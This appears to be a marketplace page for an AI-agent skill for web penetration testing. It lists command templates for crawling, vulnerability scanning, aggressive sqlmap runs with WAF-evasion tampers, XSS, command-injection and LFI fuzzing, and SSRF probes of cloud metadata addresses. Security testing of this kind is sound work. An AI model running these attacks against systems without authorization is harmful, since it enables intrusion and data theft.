원클릭으로
pentest-web
Web application penetration testing — XSS, SQLi, CSRF, SSRF, command injection, file upload, WAF bypass
Codex 또는 Claude로 설치 이 Prompt를 복사해 Codex, Claude 또는 다른 어시스턴트에 붙여 넣으면 Skill 페이지를 검토하고 설치를 진행할 수 있습니다.
메뉴
Web application penetration testing — XSS, SQLi, CSRF, SSRF, command injection, file upload, WAF bypass
Codex 또는 Claude로 설치 이 Prompt를 복사해 Codex, Claude 또는 다른 어시스턴트에 붙여 넣으면 Skill 페이지를 검토하고 설치를 진행할 수 있습니다.
SOC 직업 분류 기준
API security testing — REST, GraphQL, authentication, authorization, rate limiting, business logic
Network penetration testing — service enumeration, vulnerability scanning, credential auditing, Active Directory
Master pentest orchestration — full pipeline from target to report with confirmation gates
Comprehensive reconnaissance — passive OSINT, subdomain enumeration, port scanning, technology fingerprinting
Generate professional penetration testing reports from findings
Code security testing — SAST, SCA, secret detection, container scanning, IaC analysis
| name | pentest_web |
| description | Web application penetration testing — XSS, SQLi, CSRF, SSRF, command injection, file upload, WAF bypass |
| triggers | ["web pentest","web test","web app","xss","sqli","sql injection","csrf","ssrf"] |
Test web applications for OWASP Top 10 vulnerabilities.
katana -u {target_url} -d 3 -jc -xhr -known-files all -o /tmp/katana-endpoints.txt
ffuf -u {target_url}/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt \
-e .php,.asp,.aspx,.jsp,.json,.bak,.old,.env \
-mc 200,204,301,302,307,401,403,405,500 \
-o /tmp/ffuf-dirs.json -of json -recursion -recursion-depth 2
ffuf -u {target_url}?FUZZ=test -w /usr/share/wordlists/SecLists/Discovery/Web-Content/burp-parameter-names.txt \
-mc 200 -fs {baseline_size} -o /tmp/ffuf-params.json -of json
nuclei -u {target_url} -t cves/ -t vulnerabilities/ -t misconfiguration/ -t exposures/ \
-t default-logins/ -t takeovers/ -t ssl/ \
-severity critical,high,medium -rl 150 -c 30 \
-o /tmp/nuclei-web.txt
nikto -h {target_url} -o /tmp/nikto.txt -Format txt
wapiti -u {target_url} -f txt -o /tmp/wapiti.txt --scope url
sqlmap -u "{target_url}?param=value" --batch --level=5 --risk=3 \
--tamper=space2comment,between,randomcase --random-agent \
--output-dir=/tmp/sqlmap
ffuf -u "{target_url}?q=FUZZ" -w /usr/share/wordlists/xss-payloads.txt \
-mr "<script>|<img|onerror=|onload=\"" \
-o /tmp/xss-reflected.json -of json
commix -u "{target_url}?cmd=test" --batch --level=3 --timeout=30
ffuf -u "{target_url}/download?file=FUZZ" \
-w /usr/share/wordlists/SecLists/Fuzzing/LFI/lfi-Jhaddix.txt \
-mr "root:|daemon:|Administrator" -o /tmp/lfi.json -of json
Use interactsh for OOB detection. Test internal IPs: 127.0.0.1, localhost, 169.254.169.254
Test XML entity injection via file upload endpoints (.svg, .docx, .xml)